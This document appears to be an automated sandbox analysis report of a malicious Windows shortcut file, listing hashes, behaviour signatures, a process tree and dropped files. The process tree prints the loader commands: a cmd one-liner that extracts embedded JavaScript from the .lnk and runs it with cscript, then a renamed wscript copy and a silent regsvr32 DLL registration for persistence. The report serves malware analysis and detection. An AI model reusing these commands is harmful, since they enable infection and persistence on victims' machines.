Analysis

  • max time kernel: 191s
  • max time network: 216s
  • platform: windows7_x64
  • resource: win7-20231023-en
  • resource tags: arch:x64, arch:x86, image:win7-20231023-en, locale:en-us, os:windows7-x64, system
  • submitted: 18/11/2023, 02:49

General

  • Target: c88467a4416518a52ce45a51f96c9c280e3ece539613e82b0d9fe6f2d4122a3a.lnk
  • Size: 345KB
  • MD5: ba26b003f8f8b00da1bb1e4c12d109cc
  • SHA1: a88b3cc71121c9b96053049892abb98b4db3eedc
  • SHA256: c88467a4416518a52ce45a51f96c9c280e3ece539613e82b0d9fe6f2d4122a3a
  • SHA512: 580de04b864c1dca99635d96344a8e866353633c40d27c366d7d9bb6797ec43106044a071c86338457b3f935ab7f7294b72b2d165b45392bb28f1dda0db9ed48
  • SSDEEP: 6144:ydr8fmEOmqG2K13qPIWAiC/Q5FNTrmwMtGQqOh5PAW7LebJcDgym8/kU0:0QDOmqzHPZAilTiwMtfh5P1Lo4kB

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE (1 IoC)
  • Loads dropped DLL (2 IoCs)
  • Registers COM server for autorun (1 TTP, 2 IoCs)
  • Adds Run key to start application (2 TTPs, 1 IoC)
  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class (8 IoCs)
  • Suspicious behavior: CmdExeWriteProcessMemorySpam (2 IoCs)
  • Suspicious behavior: GetForegroundWindowSpam (2 IoCs)
  • Suspicious use of SetWindowsHookEx (4 IoCs)
  • Suspicious use of WriteProcessMemory (40 IoCs)

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\c88467a4416518a52ce45a51f96c9c280e3ece539613e82b0d9fe6f2d4122a3a.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2600
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c DIR 000792244100393251090026219142\00157269330078632939 & for /f "delims=" %a in ('dir /S/b *.lnk C:\Users\Admin\AppData\Local\Temp\*.lnk') do (if %~za gtr 79002 (findstr /b "var onm=" "%a" > C:\Users\Admin\AppData\Local\Temp\~26210619.js & cscript C:\Users\Admin\AppData\Local\Temp\~26210619.js 9))&cls&exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1588
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c dir /S/b *.lnk C:\Users\Admin\AppData\Local\Temp\*.lnk
        3⤵
          PID:2608
        • C:\Windows\system32\findstr.exe
          findstr /b "var onm=" "C:\Users\Admin\AppData\Local\Temp\c88467a4416518a52ce45a51f96c9c280e3ece539613e82b0d9fe6f2d4122a3a.lnk"
          3⤵
            PID:2684
          • C:\Windows\system32\cscript.exe
            cscript C:\Users\Admin\AppData\Local\Temp\~26210619.js 9
            3⤵
            • Adds Run key to start application
            • Suspicious use of WriteProcessMemory
            PID:2492
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c start C:\Users\Admin\AppData\Local\Temp\October_department_summary.pdf
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1412
              • C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
                "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\October_department_summary.pdf"
                5⤵
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                • Suspicious behavior: GetForegroundWindowSpam
                • Suspicious use of SetWindowsHookEx
                PID:928
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c copy C:\Windows\SysWow64\wscript.exe C:\Users\Admin\AppData\Local\Temp\dllhost.exe /y
              4⤵
                PID:2180
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\dllhost.exe C:\Users\Admin\AppData\Local\Temp\~26210619.js
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:2824
                • C:\Users\Admin\AppData\Local\Temp\dllhost.exe
                  C:\Users\Admin\AppData\Local\Temp\dllhost.exe C:\Users\Admin\AppData\Local\Temp\~26210619.js
                  5⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                  • Suspicious behavior: GetForegroundWindowSpam
                  • Suspicious use of WriteProcessMemory
                  PID:1044
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c C:\Windows\system32\regsvr32 /i /s C:\Users\Admin\AppData\Local\Temp\libeay32.dll
                    6⤵
                    • Suspicious use of WriteProcessMemory
                    PID:916
                    • C:\Windows\SysWOW64\regsvr32.exe
                      C:\Windows\system32\regsvr32 /i /s C:\Users\Admin\AppData\Local\Temp\libeay32.dll
                      7⤵
                      • Loads dropped DLL
                      • Registers COM server for autorun
                      • Modifies registry class
                      PID:2864

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\October_department_summary.pdf
    Filesize: 128KB
    MD5: c585f511f7edb1219e8f891de560614d
    SHA1: 7c7b4ac5f2fe5e3f2138a3945613f7823a00f9be
    SHA256: 831d48b6ab77f6ece7b9549d1dfb6ccf87ff9b230d39c087637288520e4fd83b
    SHA512: e588162ce74b10880a18a4501a9ebe1f723cf5cbd7949f9d79db93b0625ffb7a5d72287db0a403b12c9bf69480ba9e74b55fe1c136765098a2826c4d7140ae64

  • C:\Users\Admin\AppData\Local\Temp\dllhost.exe
    Filesize: 138KB
    MD5: d1ab72db2bedd2f255d35da3da0d4b16
    SHA1: 860265276b29b42b8c4b077e5c651def9c81b6e9
    SHA256: 047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0
    SHA512: b46830742eebc85e731c14f7dc72cc6734fcc79aab46f6080c95589c438c4cca0a069027badc0a8a78e4deeb31cdf38df3d63db679b793212a32efdad7bb8185

  • C:\Users\Admin\AppData\Local\Temp\libeay32.dll
    Filesize: 13KB
    MD5: e0b8dfd17b8e7de760b273d18e58b142
    SHA1: 801509fb6783c9e57edc67a72dde3c62080ffbaf
    SHA256: 4ef3a6703abc6b2b8e2cac3031c1e5b86fe8b377fde92737349ee52bd2604379
    SHA512: 443359da27b3c87e81ae4f4b9a2ab7e7bf6abfa93551fc62347a0b79b36d79635131abc14d4deddab3ace12fdf973496518f67e1be8dc4903b35fd465835556b

  • C:\Users\Admin\AppData\Local\Temp\~26210619.js
    Filesize: 343KB
    MD5: a585372367e029c2d987d6c6845f56e6
    SHA1: abedec3a0071e0df708f011b8e830017460f73bb
    SHA256: 336262cb2d07a9cc6d844a5fbe7c2c85db5ff7d6d05d2f44c029f5baf29b9935
    SHA512: f0496c5020438d3b1d93bb61fb322ab7677b706f8e472e8f82524f8d43d87ae830d72357a5ba93ed26897b3f0dd9a28d134221b19b9c2063ed362a5f7c22ba4d

  • C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
    Filesize: 3KB
    MD5: 28062c7f330be3fe2fae998b2b295a8c
    SHA1: 52ab4e915dc2572fea5d61b6e9150b5143a61c46
    SHA256: 7ff10efff32397f8ff673ed8f24bb84ee1f6870a9fb49e9863294246425ccf91
    SHA512: 0413bef499b73193ed2d1f442edf06951bd6f64c256ac79b756e3201b6060c4a8998b34a3bceb6b1721106503022cde4eae0202a9943eec62e6ecf28bff69cd3

  • \Users\Admin\AppData\Local\Temp\libeay32.dll
    Filesize: 13KB
    MD5: e0b8dfd17b8e7de760b273d18e58b142
    SHA1: 801509fb6783c9e57edc67a72dde3c62080ffbaf
    SHA256: 4ef3a6703abc6b2b8e2cac3031c1e5b86fe8b377fde92737349ee52bd2604379
    SHA512: 443359da27b3c87e81ae4f4b9a2ab7e7bf6abfa93551fc62347a0b79b36d79635131abc14d4deddab3ace12fdf973496518f67e1be8dc4903b35fd465835556b

  • memory/1044-93-0x00000000004B0000-0x00000000004C2000-memory.dmp
    Filesize: 72KB
  • memory/1044-94-0x0000000000490000-0x0000000000499000-memory.dmp
    Filesize: 36KB
  • memory/1044-92-0x0000000000340000-0x0000000000341000-memory.dmp
    Filesize: 4KB
  • memory/1044-84-0x0000000000340000-0x0000000000341000-memory.dmp
    Filesize: 4KB
  • memory/1044-96-0x00000000004B0000-0x00000000004C2000-memory.dmp
    Filesize: 72KB